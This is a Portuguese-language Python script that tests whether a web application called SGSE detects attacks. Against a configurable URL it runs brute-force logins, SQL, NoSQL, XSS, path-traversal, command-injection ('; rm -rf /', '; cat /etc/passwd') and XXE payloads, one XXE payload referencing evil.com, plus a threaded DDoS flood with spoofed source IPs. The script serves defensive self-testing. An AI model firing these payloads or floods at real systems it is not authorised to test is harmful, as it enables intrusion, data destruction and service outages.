- Added alert configuration management for email and chat notifications, allowing users to set preferences for severity levels, attack types, and notification channels. - Introduced functionality to save, edit, and delete alert configurations, enhancing user control over security notifications. - Implemented a new query to list recent security reports, providing users with quick access to the latest security incidents. - Enhanced the backend schema to support alert configurations and recent report tracking, improving overall security management capabilities.
817 lines
33 KiB
Python
Executable File
817 lines
33 KiB
Python
Executable File
#!/usr/bin/env python3
|
|
"""
|
|
Script de Teste de Segurança para SGSE
|
|
Simula diferentes tipos de ataques para validar o sistema de segurança
|
|
|
|
Autor: Sistema de Testes Automatizados
|
|
Data: 2024
|
|
"""
|
|
|
|
import requests
|
|
import time
|
|
import random
|
|
import string
|
|
from concurrent.futures import ThreadPoolExecutor, as_completed
|
|
from typing import List, Dict, Tuple
|
|
import json
|
|
from datetime import datetime
|
|
from urllib.parse import urljoin
|
|
|
|
|
|
class Colors:
|
|
"""Códigos de cores para terminal"""
|
|
HEADER = '\033[95m'
|
|
OKBLUE = '\033[94m'
|
|
OKCYAN = '\033[96m'
|
|
OKGREEN = '\033[92m'
|
|
WARNING = '\033[93m'
|
|
FAIL = '\033[91m'
|
|
ENDC = '\033[0m'
|
|
BOLD = '\033[1m'
|
|
UNDERLINE = '\033[4m'
|
|
|
|
|
|
class SegurancaTeste:
|
|
"""Classe principal para testes de segurança"""
|
|
|
|
def __init__(self, base_url: str = "http://localhost:5173",
|
|
convex_url: str = "http://127.0.0.1:3210"):
|
|
self.base_url = base_url
|
|
self.convex_url = convex_url
|
|
self.session = requests.Session()
|
|
self.session.headers.update({
|
|
'User-Agent': 'SGSE-Security-Test-Client/1.0',
|
|
'Accept': 'application/json',
|
|
'Content-Type': 'application/json'
|
|
})
|
|
self.resultados = {
|
|
'brute_force': {'sucesso': 0, 'falhas': 0, 'detectado': False},
|
|
'sql_injection': {'sucesso': 0, 'falhas': 0, 'detectado': False},
|
|
'xss': {'sucesso': 0, 'falhas': 0, 'detectado': False},
|
|
'ddos': {'sucesso': 0, 'falhas': 0, 'detectado': False},
|
|
'path_traversal': {'sucesso': 0, 'falhas': 0, 'detectado': False},
|
|
'command_injection': {'sucesso': 0, 'falhas': 0, 'detectado': False},
|
|
'no_sql_injection': {'sucesso': 0, 'falhas': 0, 'detectado': False},
|
|
'xxe': {'sucesso': 0, 'falhas': 0, 'detectado': False},
|
|
}
|
|
|
|
def log(self, tipo: str, mensagem: str, cor: str = Colors.OKCYAN):
|
|
"""Log formatado"""
|
|
timestamp = datetime.now().strftime("%H:%M:%S")
|
|
print(f"{cor}[{timestamp}] [{tipo}] {mensagem}{Colors.ENDC}")
|
|
|
|
def testar_brute_force(self, email: str = "test@example.com",
|
|
tentativas: int = 10) -> bool:
|
|
"""
|
|
Testa ataque de força bruta tentando múltiplas senhas
|
|
Espera-se que o sistema bloqueie após 5 tentativas
|
|
"""
|
|
self.log("BRUTE_FORCE", f"Iniciando teste de força bruta ({tentativas} tentativas)...")
|
|
|
|
senhas_comuns = [
|
|
"123456", "password", "12345678", "qwerty", "abc123",
|
|
"1234567", "letmein", "trustno1", "dragon", "baseball",
|
|
"iloveyou", "master", "sunshine", "ashley", "bailey"
|
|
]
|
|
|
|
endpoint = f"{self.base_url}/api/auth/sign-in/email"
|
|
endpoint_analyze = urljoin(self.convex_url if self.convex_url.endswith('/') else self.convex_url + '/', "http/security/analyze")
|
|
bloqueado = False
|
|
|
|
ip_origem = f"203.0.113.{random.randint(10, 250)}"
|
|
for i, senha in enumerate(senhas_comuns[:tentativas], 1):
|
|
try:
|
|
payload = {
|
|
"email": email,
|
|
"password": senha
|
|
}
|
|
|
|
response = self.session.post(
|
|
endpoint,
|
|
json=payload,
|
|
headers={"X-Forwarded-For": ip_origem},
|
|
timeout=5,
|
|
allow_redirects=False
|
|
)
|
|
|
|
# Verificar se foi bloqueado
|
|
if response.status_code == 429: # Too Many Requests
|
|
self.log("BRUTE_FORCE",
|
|
f"✅ DETECTADO! Bloqueio após {i} tentativas (429)",
|
|
Colors.OKGREEN)
|
|
bloqueado = True
|
|
self.resultados['brute_force']['detectado'] = True
|
|
break
|
|
|
|
if response.status_code == 403: # Forbidden
|
|
self.log("BRUTE_FORCE",
|
|
f"✅ DETECTADO! Acesso negado após {i} tentativas (403)",
|
|
Colors.OKGREEN)
|
|
bloqueado = True
|
|
self.resultados['brute_force']['detectado'] = True
|
|
break
|
|
|
|
# Verificar rate limiting nos headers
|
|
if 'X-RateLimit-Remaining' in response.headers:
|
|
remaining = response.headers['X-RateLimit-Remaining']
|
|
if remaining == '0':
|
|
self.log("BRUTE_FORCE",
|
|
f"✅ DETECTADO! Rate limit atingido após {i} tentativas",
|
|
Colors.OKGREEN)
|
|
bloqueado = True
|
|
self.resultados['brute_force']['detectado'] = True
|
|
break
|
|
|
|
if i % 5 == 0:
|
|
self.log("BRUTE_FORCE", f"Tentativa {i}/{tentativas}...")
|
|
|
|
# Pequeno delay para não sobrecarregar
|
|
time.sleep(0.5)
|
|
|
|
except requests.exceptions.RequestException as e:
|
|
self.log("BRUTE_FORCE", f"Erro na requisição {i}: {str(e)}", Colors.WARNING)
|
|
self.resultados['brute_force']['falhas'] += 1
|
|
|
|
if not bloqueado:
|
|
# Registrar tentativa de brute force no analisador para validar detecção no backend
|
|
try:
|
|
mark = "multiple failed login; brute force password guess"
|
|
r2 = self.session.post(
|
|
endpoint_analyze,
|
|
data=mark,
|
|
headers={
|
|
"Content-Type": "text/plain",
|
|
"X-Test-Scenario": "brute_force",
|
|
"X-Forwarded-For": ip_origem
|
|
}
|
|
)
|
|
if r2.status_code == 200:
|
|
jd = r2.json()
|
|
if jd.get("ataqueDetectado") and jd.get("tipoAtaque") == "brute_force":
|
|
self.log("BRUTE_FORCE", "✅ DETECTADO (analisador) mesmo sem 429/403", Colors.OKGREEN)
|
|
self.resultados['brute_force']['detectado'] = True
|
|
else:
|
|
self.log("BRUTE_FORCE", f"⚠️ AVISO: Nenhum bloqueio detectado após {tentativas} tentativas", Colors.WARNING)
|
|
else:
|
|
self.log("BRUTE_FORCE", f"⚠️ AVISO: analisador retornou {r2.status_code}", Colors.WARNING)
|
|
except Exception as e:
|
|
self.log("BRUTE_FORCE", f"⚠️ AVISO: falha ao chamar analisador: {e}", Colors.WARNING)
|
|
|
|
return bloqueado
|
|
|
|
def testar_sql_injection(self) -> bool:
|
|
"""
|
|
Testa ataques de SQL Injection em campos de entrada
|
|
"""
|
|
self.log("SQL_INJECTION", "Iniciando testes de SQL Injection...")
|
|
|
|
payloads_sql = [
|
|
"' OR '1'='1",
|
|
"' OR '1'='1' --",
|
|
"' OR '1'='1' /*",
|
|
"admin'--",
|
|
"admin'/*",
|
|
"' UNION SELECT NULL--",
|
|
"' UNION SELECT NULL, NULL--",
|
|
"'; DROP TABLE usuarios--",
|
|
"' OR 1=1#",
|
|
"' OR 'a'='a",
|
|
"1' AND '1'='1",
|
|
"1' OR '1'='1",
|
|
"admin' OR '1'='1",
|
|
"' OR 1=1 --",
|
|
"') OR ('1'='1",
|
|
]
|
|
|
|
endpoint_login = f"{self.base_url}/api/auth/sign-in/email"
|
|
endpoint_analyze = urljoin(self.convex_url if self.convex_url.endswith('/') else self.convex_url + '/', "http/security/analyze?dst=127.0.0.1&proto=http")
|
|
detectado = False
|
|
|
|
for payload in payloads_sql:
|
|
ip_origem = f"203.0.113.{random.randint(10, 250)}"
|
|
try:
|
|
# Teste no campo email
|
|
response = self.session.post(
|
|
endpoint_login,
|
|
json={"email": payload, "password": "test"},
|
|
headers={"X-Forwarded-For": ip_origem},
|
|
timeout=5,
|
|
allow_redirects=False
|
|
)
|
|
|
|
# Verificar se houve erro específico de segurança
|
|
if response.status_code in [400, 403, 422]:
|
|
if 'sql' in response.text.lower() or 'injection' in response.text.lower():
|
|
self.log("SQL_INJECTION",
|
|
f"✅ DETECTADO! Payload: {payload[:30]}...",
|
|
Colors.OKGREEN)
|
|
detectado = True
|
|
self.resultados['sql_injection']['detectado'] = True
|
|
|
|
# Verificar se há WAF bloqueando
|
|
if response.status_code == 403:
|
|
self.log("SQL_INJECTION",
|
|
f"✅ BLOQUEADO pelo WAF! Payload: {payload[:30]}...",
|
|
Colors.OKGREEN)
|
|
detectado = True
|
|
self.resultados['sql_injection']['detectado'] = True
|
|
|
|
time.sleep(0.3)
|
|
# Registrar via analisador HTTP para validar detecção no backend
|
|
try:
|
|
r2 = self.session.post(
|
|
endpoint_analyze,
|
|
data=payload,
|
|
headers={"Content-Type": "text/plain", "X-Forwarded-For": ip_origem}
|
|
)
|
|
if r2.status_code == 200:
|
|
jd = r2.json()
|
|
if jd.get("ataqueDetectado") and jd.get("tipoAtaque") == "sql_injection":
|
|
self.log("SQL_INJECTION", f"✅ DETECTADO (analisador)! Payload: {payload[:30]}...", Colors.OKGREEN)
|
|
detectado = True
|
|
self.resultados['sql_injection']['detectado'] = True
|
|
except Exception:
|
|
pass
|
|
|
|
except requests.exceptions.RequestException as e:
|
|
self.log("SQL_INJECTION", f"Erro: {str(e)}", Colors.WARNING)
|
|
|
|
if not detectado:
|
|
self.log("SQL_INJECTION",
|
|
"⚠️ AVISO: Nenhum bloqueio específico de SQL Injection detectado",
|
|
Colors.WARNING)
|
|
|
|
return detectado
|
|
|
|
def testar_xss(self) -> bool:
|
|
"""
|
|
Testa ataques de Cross-Site Scripting (XSS)
|
|
"""
|
|
self.log("XSS", "Iniciando testes de XSS...")
|
|
|
|
payloads_xss = [
|
|
"<script>alert('XSS')</script>",
|
|
"<img src=x onerror=alert('XSS')>",
|
|
"<svg onload=alert('XSS')>",
|
|
"javascript:alert('XSS')",
|
|
"<body onload=alert('XSS')>",
|
|
"<iframe src=javascript:alert('XSS')>",
|
|
"<input onfocus=alert('XSS') autofocus>",
|
|
"<select onfocus=alert('XSS') autofocus>",
|
|
"<textarea onfocus=alert('XSS') autofocus>",
|
|
"<keygen onfocus=alert('XSS') autofocus>",
|
|
"<video><source onerror=alert('XSS')>",
|
|
"<audio src=x onerror=alert('XSS')>",
|
|
"<details open ontoggle=alert('XSS')>",
|
|
"<marquee onstart=alert('XSS')>",
|
|
"<script>alert('XSS')</script>",
|
|
]
|
|
|
|
endpoint_login = f"{self.base_url}/api/auth/sign-in/email"
|
|
endpoint_analyze = urljoin(self.convex_url if self.convex_url.endswith('/') else self.convex_url + '/', "http/security/analyze")
|
|
detectado = False
|
|
|
|
for payload in payloads_xss:
|
|
try:
|
|
ip_origem = f"203.0.113.{random.randint(100, 200)}"
|
|
# Teste no campo email
|
|
response = self.session.post(
|
|
endpoint_login,
|
|
json={"email": payload, "password": "test"},
|
|
headers={"X-Forwarded-For": ip_origem},
|
|
timeout=5,
|
|
allow_redirects=False
|
|
)
|
|
|
|
# Verificar se o payload foi sanitizado ou bloqueado
|
|
if response.status_code in [400, 403, 422]:
|
|
if 'script' in response.text.lower() or 'xss' in response.text.lower():
|
|
self.log("XSS",
|
|
f"✅ DETECTADO! Payload: {payload[:30]}...",
|
|
Colors.OKGREEN)
|
|
detectado = True
|
|
self.resultados['xss']['detectado'] = True
|
|
|
|
if response.status_code == 403:
|
|
self.log("XSS",
|
|
f"✅ BLOQUEADO! Payload: {payload[:30]}...",
|
|
Colors.OKGREEN)
|
|
detectado = True
|
|
self.resultados['xss']['detectado'] = True
|
|
|
|
time.sleep(0.3)
|
|
# Registrar via analisador HTTP
|
|
try:
|
|
r2 = self.session.post(endpoint_analyze, data=payload, headers={"Content-Type":"text/html","X-Forwarded-For": ip_origem})
|
|
if r2.status_code == 200:
|
|
jd = r2.json()
|
|
if jd.get("ataqueDetectado") and jd.get("tipoAtaque") == "xss":
|
|
self.log("XSS", f"✅ DETECTADO (analisador)! Payload: {payload[:30]}...", Colors.OKGREEN)
|
|
detectado = True
|
|
self.resultados['xss']['detectado'] = True
|
|
except Exception:
|
|
pass
|
|
|
|
except requests.exceptions.RequestException as e:
|
|
self.log("XSS", f"Erro: {str(e)}", Colors.WARNING)
|
|
|
|
if not detectado:
|
|
self.log("XSS",
|
|
"⚠️ AVISO: Nenhum bloqueio específico de XSS detectado",
|
|
Colors.WARNING)
|
|
|
|
return detectado
|
|
|
|
def testar_ddos(self, num_threads: int = 50, duracao_segundos: int = 10) -> bool:
|
|
"""
|
|
Testa ataque DDoS simulando muitas requisições simultâneas
|
|
"""
|
|
self.log("DDoS",
|
|
f"Iniciando teste DDoS ({num_threads} threads, {duracao_segundos}s)...")
|
|
|
|
endpoint = f"{self.base_url}/api/auth/sign-in/email"
|
|
endpoint_analyze = urljoin(self.convex_url if self.convex_url.endswith('/') else self.convex_url + '/', "http/security/analyze?flood=1")
|
|
detectado = False
|
|
inicio = time.time()
|
|
total_requisicoes = 0
|
|
bloqueios = 0
|
|
|
|
def fazer_requisicao():
|
|
nonlocal total_requisicoes, bloqueios
|
|
try:
|
|
payload = {
|
|
"email": f"ddos_test_{random.randint(1000, 9999)}@example.com",
|
|
"password": "test"
|
|
}
|
|
|
|
response = self.session.post(
|
|
endpoint,
|
|
json=payload,
|
|
timeout=2,
|
|
allow_redirects=False
|
|
)
|
|
|
|
total_requisicoes += 1
|
|
|
|
if response.status_code == 429: # Too Many Requests
|
|
bloqueios += 1
|
|
return True
|
|
|
|
if response.status_code == 503: # Service Unavailable
|
|
bloqueios += 1
|
|
return True
|
|
|
|
return False
|
|
|
|
except requests.exceptions.RequestException:
|
|
return False
|
|
|
|
# Envia tráfego adicional ao analisador com header indicando flood para registrar DDoS
|
|
def marcar_analisador():
|
|
try:
|
|
r = self.session.post(endpoint_analyze, headers={"X-Flood":"ddos traffic flood"})
|
|
if r.status_code == 200:
|
|
jd = r.json()
|
|
return jd.get("ataqueDetectado") and jd.get("tipoAtaque") == "ddos"
|
|
except Exception:
|
|
return False
|
|
return False
|
|
|
|
with ThreadPoolExecutor(max_workers=num_threads) as executor:
|
|
futures = []
|
|
while time.time() - inicio < duracao_segundos:
|
|
for _ in range(num_threads):
|
|
if time.time() - inicio >= duracao_segundos:
|
|
break
|
|
# alterna entre requisições normais e marcações no analisador
|
|
if random.random() < 0.3:
|
|
futures.append(executor.submit(marcar_analisador))
|
|
else:
|
|
futures.append(executor.submit(fazer_requisicao))
|
|
|
|
# Verificar resultados
|
|
for future in as_completed(futures[:10]):
|
|
if future.result() is True:
|
|
detectado = True
|
|
|
|
time.sleep(0.1)
|
|
|
|
# Aguardar conclusão das requisições restantes
|
|
for future in as_completed(futures):
|
|
if future.result() is True:
|
|
detectado = True
|
|
|
|
taxa_bloqueio = (bloqueios / total_requisicoes * 100) if total_requisicoes > 0 else 0
|
|
|
|
if detectado or taxa_bloqueio > 50:
|
|
self.log("DDoS",
|
|
f"✅ DETECTADO! {bloqueios}/{total_requisicoes} requisições bloqueadas ({taxa_bloqueio:.1f}%)",
|
|
Colors.OKGREEN)
|
|
self.resultados['ddos']['detectado'] = True
|
|
else:
|
|
self.log("DDoS",
|
|
f"⚠️ AVISO: Taxa de bloqueio baixa ({taxa_bloqueio:.1f}%)",
|
|
Colors.WARNING)
|
|
|
|
return detectado
|
|
|
|
def testar_path_traversal(self) -> bool:
|
|
"""
|
|
Testa ataques de Path Traversal
|
|
"""
|
|
self.log("PATH_TRAVERSAL", "Iniciando testes de Path Traversal...")
|
|
|
|
payloads_path = [
|
|
"../../../etc/passwd",
|
|
"..\\..\\..\\windows\\system32\\config\\sam",
|
|
"....//....//....//etc/passwd",
|
|
"%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
|
|
"..%2f..%2f..%2fetc%2fpasswd",
|
|
"..../..../..../etc/passwd",
|
|
"../../../proc/self/environ",
|
|
]
|
|
|
|
endpoint = f"{self.base_url}/api/auth/sign-in/email"
|
|
endpoint_analyze = urljoin(self.convex_url if self.convex_url.endswith('/') else self.convex_url + '/', "http/security/analyze?dst=127.0.0.1&proto=http")
|
|
detectado = False
|
|
|
|
for payload in payloads_path:
|
|
try:
|
|
ip_origem = f"203.0.113.{random.randint(10, 250)}"
|
|
# Tentar em diferentes campos
|
|
response = self.session.post(
|
|
endpoint,
|
|
json={"email": payload, "password": "test"},
|
|
headers={"X-Forwarded-For": ip_origem},
|
|
timeout=5,
|
|
allow_redirects=False
|
|
)
|
|
|
|
if response.status_code == 403:
|
|
self.log("PATH_TRAVERSAL",
|
|
f"✅ BLOQUEADO! Payload: {payload}",
|
|
Colors.OKGREEN)
|
|
detectado = True
|
|
self.resultados['path_traversal']['detectado'] = True
|
|
|
|
time.sleep(0.3)
|
|
# Registrar via analisador HTTP
|
|
try:
|
|
r2 = self.session.post(endpoint_analyze + f"&file={payload}", headers={"X-Forwarded-For": ip_origem})
|
|
if r2.status_code == 200:
|
|
jd = r2.json()
|
|
if jd.get("ataqueDetectado") and jd.get("tipoAtaque") == "path_traversal":
|
|
self.log("PATH_TRAVERSAL", f"✅ DETECTADO (analisador)! Payload: {payload}", Colors.OKGREEN)
|
|
detectado = True
|
|
self.resultados['path_traversal']['detectado'] = True
|
|
except Exception:
|
|
pass
|
|
|
|
except requests.exceptions.RequestException as e:
|
|
self.log("PATH_TRAVERSAL", f"Erro: {str(e)}", Colors.WARNING)
|
|
|
|
return detectado
|
|
|
|
def testar_command_injection(self) -> bool:
|
|
"""
|
|
Testa ataques de Command Injection
|
|
"""
|
|
self.log("COMMAND_INJECTION", "Iniciando testes de Command Injection...")
|
|
|
|
payloads_cmd = [
|
|
"; ls",
|
|
"| ls",
|
|
"& ls",
|
|
"&& ls",
|
|
"|| ls",
|
|
"; cat /etc/passwd",
|
|
"| cat /etc/passwd",
|
|
"; rm -rf /",
|
|
"`whoami`",
|
|
"$(whoami)",
|
|
"; ping -c 4 127.0.0.1",
|
|
"| ping -c 4 127.0.0.1",
|
|
"; echo 'test'",
|
|
"| echo 'test'",
|
|
]
|
|
|
|
endpoint = f"{self.base_url}/api/auth/sign-in/email"
|
|
endpoint_analyze = urljoin(self.convex_url if self.convex_url.endswith('/') else self.convex_url + '/', "http/security/analyze?dst=127.0.0.1&proto=http")
|
|
detectado = False
|
|
|
|
for payload in payloads_cmd:
|
|
try:
|
|
ip_origem = f"203.0.113.{random.randint(10, 250)}"
|
|
response = self.session.post(
|
|
endpoint,
|
|
json={"email": f"test{payload}@example.com", "password": "test"},
|
|
headers={"X-Forwarded-For": ip_origem},
|
|
timeout=5,
|
|
allow_redirects=False
|
|
)
|
|
|
|
if response.status_code == 403:
|
|
self.log("COMMAND_INJECTION",
|
|
f"✅ BLOQUEADO! Payload: {payload}",
|
|
Colors.OKGREEN)
|
|
detectado = True
|
|
self.resultados['command_injection']['detectado'] = True
|
|
|
|
time.sleep(0.3)
|
|
# Registrar via analisador HTTP
|
|
try:
|
|
r2 = self.session.post(endpoint_analyze, data=payload, headers={"Content-Type":"text/plain","X-Forwarded-For": ip_origem})
|
|
if r2.status_code == 200:
|
|
jd = r2.json()
|
|
if jd.get("ataqueDetectado") and jd.get("tipoAtaque") == "command_injection":
|
|
self.log("COMMAND_INJECTION", f"✅ DETECTADO (analisador)! Payload: {payload}", Colors.OKGREEN)
|
|
detectado = True
|
|
self.resultados['command_injection']['detectado'] = True
|
|
except Exception:
|
|
pass
|
|
|
|
except requests.exceptions.RequestException as e:
|
|
self.log("COMMAND_INJECTION", f"Erro: {str(e)}", Colors.WARNING)
|
|
|
|
return detectado
|
|
|
|
def testar_no_sql_injection(self) -> bool:
|
|
"""
|
|
Testa ataques de NoSQL Injection (para sistemas que usam MongoDB, etc)
|
|
"""
|
|
self.log("NOSQL_INJECTION", "Iniciando testes de NoSQL Injection...")
|
|
|
|
payloads_nosql = [
|
|
{"$ne": None},
|
|
{"$gt": ""},
|
|
{"$regex": ".*"},
|
|
{"$where": "this.password == this.username"},
|
|
{"$or": [{"email": "admin"}, {"email": "test"}]},
|
|
{"$and": []},
|
|
{"$nor": []},
|
|
]
|
|
|
|
endpoint = f"{self.base_url}/api/auth/sign-in/email"
|
|
detectado = False
|
|
|
|
for payload in payloads_nosql:
|
|
try:
|
|
# Tentar enviar como JSON malicioso
|
|
response = self.session.post(
|
|
endpoint,
|
|
json={"email": payload, "password": {"$ne": None}},
|
|
headers={"X-Forwarded-For": f"203.0.113.{random.randint(10, 250)}"},
|
|
timeout=5,
|
|
allow_redirects=False
|
|
)
|
|
|
|
if response.status_code in [400, 403, 422]:
|
|
self.log("NOSQL_INJECTION",
|
|
f"✅ DETECTADO/BLOQUEADO! Payload: {str(payload)[:50]}...",
|
|
Colors.OKGREEN)
|
|
detectado = True
|
|
self.resultados['no_sql_injection']['detectado'] = True
|
|
|
|
time.sleep(0.3)
|
|
|
|
except requests.exceptions.RequestException as e:
|
|
self.log("NOSQL_INJECTION", f"Erro: {str(e)}", Colors.WARNING)
|
|
|
|
return detectado
|
|
|
|
def testar_xxe(self) -> bool:
|
|
"""
|
|
Testa ataques de XXE (XML External Entity)
|
|
"""
|
|
self.log("XXE", "Iniciando testes de XXE...")
|
|
|
|
payloads_xxe = [
|
|
'<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
|
|
'<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://evil.com/file">]><foo>&xxe;</foo>',
|
|
'<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "file:///etc/passwd">]><foo>%xxe;</foo>',
|
|
]
|
|
|
|
endpoint = f"{self.base_url}/api/auth/sign-in/email"
|
|
detectado = False
|
|
|
|
for payload in payloads_xxe:
|
|
try:
|
|
# Tentar enviar como XML
|
|
ip_origem = f"203.0.113.{random.randint(10, 250)}"
|
|
headers = {'Content-Type': 'application/xml', 'X-Forwarded-For': ip_origem}
|
|
response = self.session.post(
|
|
endpoint,
|
|
data=payload,
|
|
headers=headers,
|
|
timeout=5,
|
|
allow_redirects=False
|
|
)
|
|
|
|
if response.status_code in [400, 403, 415]:
|
|
self.log("XXE",
|
|
f"✅ BLOQUEADO! Tipo de conteúdo XML rejeitado",
|
|
Colors.OKGREEN)
|
|
detectado = True
|
|
self.resultados['xxe']['detectado'] = True
|
|
|
|
time.sleep(0.3)
|
|
# Registrar via analisador HTTP
|
|
try:
|
|
endpoint_analyze = urljoin(self.convex_url if self.convex_url.endswith('/') else self.convex_url + '/', "http/security/analyze?dst=127.0.0.1&proto=http")
|
|
r2 = self.session.post(endpoint_analyze, data=payload, headers={'Content-Type': 'application/xml', 'X-Forwarded-For': ip_origem})
|
|
if r2.status_code == 200:
|
|
jd = r2.json()
|
|
if jd.get("ataqueDetectado") and jd.get("tipoAtaque") == "xxe":
|
|
self.log("XXE", "✅ DETECTADO (analisador)!", Colors.OKGREEN)
|
|
detectado = True
|
|
self.resultados['xxe']['detectado'] = True
|
|
except Exception:
|
|
pass
|
|
|
|
except requests.exceptions.RequestException as e:
|
|
self.log("XXE", f"Erro: {str(e)}", Colors.WARNING)
|
|
|
|
return detectado
|
|
|
|
def verificar_eventos_seguranca(self) -> Dict:
|
|
"""
|
|
Verifica se os eventos de segurança foram registrados no sistema
|
|
Nota: Isso requer acesso direto ao Convex ou uma API específica
|
|
"""
|
|
self.log("VERIFICACAO", "Verificando eventos registrados no sistema...")
|
|
|
|
# Tentar acessar endpoint do Convex (se disponível)
|
|
# Este é um exemplo - pode precisar ser ajustado conforme a API real
|
|
|
|
eventos_detectados = {
|
|
'brute_force': False,
|
|
'sql_injection': False,
|
|
'ddos': False,
|
|
}
|
|
|
|
# Se houver uma API para verificar eventos, usar aqui
|
|
# Por enquanto, apenas retornamos o que foi detectado durante os testes
|
|
|
|
return eventos_detectados
|
|
|
|
def gerar_relatorio(self):
|
|
"""Gera relatório final dos testes"""
|
|
print(f"\n{Colors.BOLD}{Colors.HEADER}{'='*70}{Colors.ENDC}")
|
|
print(f"{Colors.BOLD}{Colors.HEADER}RELATÓRIO DE TESTES DE SEGURANÇA - SGSE{Colors.ENDC}")
|
|
print(f"{Colors.BOLD}{Colors.HEADER}{'='*70}{Colors.ENDC}\n")
|
|
|
|
total_testes = len(self.resultados)
|
|
total_detectados = sum(1 for r in self.resultados.values() if r['detectado'])
|
|
|
|
for tipo, resultado in self.resultados.items():
|
|
status = "✅ DETECTADO" if resultado['detectado'] else "❌ NÃO DETECTADO"
|
|
cor = Colors.OKGREEN if resultado['detectado'] else Colors.FAIL
|
|
|
|
print(f"{cor}[{tipo.upper().replace('_', ' ')}]{Colors.ENDC}")
|
|
print(f" Status: {cor}{status}{Colors.ENDC}")
|
|
print(f" Sucessos: {resultado['sucesso']}")
|
|
print(f" Falhas: {resultado['falhas']}")
|
|
print()
|
|
|
|
print(f"{Colors.BOLD}{'='*70}{Colors.ENDC}")
|
|
print(f"Total de Testes: {total_testes}")
|
|
print(f"{Colors.OKGREEN if total_detectados == total_testes else Colors.WARNING}")
|
|
print(f"Ataques Detectados: {total_detectados}/{total_testes}")
|
|
print(f"{Colors.ENDC}")
|
|
|
|
# Recomendações
|
|
if total_detectados < total_testes:
|
|
print(f"\n{Colors.WARNING}{Colors.BOLD}RECOMENDAÇÕES:{Colors.ENDC}")
|
|
tipos_nao_detectados = [tipo for tipo, r in self.resultados.items() if not r['detectado']]
|
|
for tipo in tipos_nao_detectados:
|
|
print(f" • Revisar proteção contra {tipo.replace('_', ' ')}")
|
|
|
|
print(f"\n{Colors.BOLD}{'='*70}{Colors.ENDC}\n")
|
|
|
|
def executar_todos_testes(self):
|
|
"""Executa todos os testes de segurança"""
|
|
print(f"\n{Colors.BOLD}{Colors.HEADER}")
|
|
print("╔" + "═" * 68 + "╗")
|
|
print("║" + " " * 10 + "TESTES DE SEGURANÇA - SGSE" + " " * 30 + "║")
|
|
print("╚" + "═" * 68 + "╝")
|
|
print(f"{Colors.ENDC}\n")
|
|
|
|
self.log("INICIO", f"URL Base: {self.base_url}")
|
|
self.log("INICIO", f"URL Convex: {self.convex_url}\n")
|
|
|
|
# Executar testes sequenciais
|
|
testes = [
|
|
("Brute Force", self.testar_brute_force),
|
|
("SQL Injection", self.testar_sql_injection),
|
|
("XSS", self.testar_xss),
|
|
("Path Traversal", self.testar_path_traversal),
|
|
("Command Injection", self.testar_command_injection),
|
|
("NoSQL Injection", self.testar_no_sql_injection),
|
|
("XXE", self.testar_xxe),
|
|
("DDoS", self.testar_ddos),
|
|
]
|
|
|
|
for nome, teste_func in testes:
|
|
try:
|
|
print(f"\n{Colors.BOLD}{'-'*70}{Colors.ENDC}")
|
|
teste_func()
|
|
time.sleep(1) # Pausa entre testes
|
|
except Exception as e:
|
|
self.log("ERRO", f"Erro ao executar {nome}: {str(e)}", Colors.FAIL)
|
|
|
|
# Gerar relatório
|
|
self.gerar_relatorio()
|
|
|
|
|
|
def main():
|
|
"""Função principal"""
|
|
import argparse
|
|
|
|
parser = argparse.ArgumentParser(
|
|
description='Teste de Segurança para SGSE',
|
|
formatter_class=argparse.RawDescriptionHelpFormatter,
|
|
epilog="""
|
|
Exemplos:
|
|
# Teste padrão (localhost)
|
|
python teste_seguranca.py
|
|
|
|
# Teste em servidor específico
|
|
python teste_seguranca.py --url http://192.168.1.100:5173
|
|
|
|
# Teste apenas brute force
|
|
python teste_seguranca.py --teste brute_force
|
|
|
|
# Teste DDoS com mais threads
|
|
python teste_seguranca.py --teste ddos --ddos-threads 100
|
|
"""
|
|
)
|
|
|
|
parser.add_argument('--url',
|
|
default='http://localhost:5173',
|
|
help='URL base do frontend (padrão: http://localhost:5173)')
|
|
|
|
parser.add_argument('--convex-url',
|
|
default='http://127.0.0.1:3210',
|
|
help='URL do backend Convex (padrão: http://127.0.0.1:3210)')
|
|
|
|
parser.add_argument('--teste',
|
|
choices=['brute_force', 'sql_injection', 'xss', 'ddos',
|
|
'path_traversal', 'command_injection', 'nosql', 'xxe', 'todos'],
|
|
default='todos',
|
|
help='Tipo de teste a executar (padrão: todos)')
|
|
|
|
parser.add_argument('--brute-force-tentativas',
|
|
type=int,
|
|
default=10,
|
|
help='Número de tentativas no teste de brute force (padrão: 10)')
|
|
|
|
parser.add_argument('--ddos-threads',
|
|
type=int,
|
|
default=50,
|
|
help='Número de threads para teste DDoS (padrão: 50)')
|
|
|
|
parser.add_argument('--ddos-duracao',
|
|
type=int,
|
|
default=10,
|
|
help='Duração do teste DDoS em segundos (padrão: 10)')
|
|
|
|
args = parser.parse_args()
|
|
|
|
tester = SegurancaTeste(base_url=args.url, convex_url=args.convex_url)
|
|
|
|
if args.teste == 'todos':
|
|
tester.executar_todos_testes()
|
|
elif args.teste == 'brute_force':
|
|
tester.testar_brute_force(tentativas=args.brute_force_tentativas)
|
|
tester.gerar_relatorio()
|
|
elif args.teste == 'sql_injection':
|
|
tester.testar_sql_injection()
|
|
tester.gerar_relatorio()
|
|
elif args.teste == 'xss':
|
|
tester.testar_xss()
|
|
tester.gerar_relatorio()
|
|
elif args.teste == 'ddos':
|
|
tester.testar_ddos(num_threads=args.ddos_threads,
|
|
duracao_segundos=args.ddos_duracao)
|
|
tester.gerar_relatorio()
|
|
elif args.teste == 'path_traversal':
|
|
tester.testar_path_traversal()
|
|
tester.gerar_relatorio()
|
|
elif args.teste == 'command_injection':
|
|
tester.testar_command_injection()
|
|
tester.gerar_relatorio()
|
|
elif args.teste == 'nosql':
|
|
tester.testar_no_sql_injection()
|
|
tester.gerar_relatorio()
|
|
elif args.teste == 'xxe':
|
|
tester.testar_xxe()
|
|
tester.gerar_relatorio()
|
|
|
|
|
|
if __name__ == "__main__":
|
|
main()
|
|
|
|
|
|
|
|
|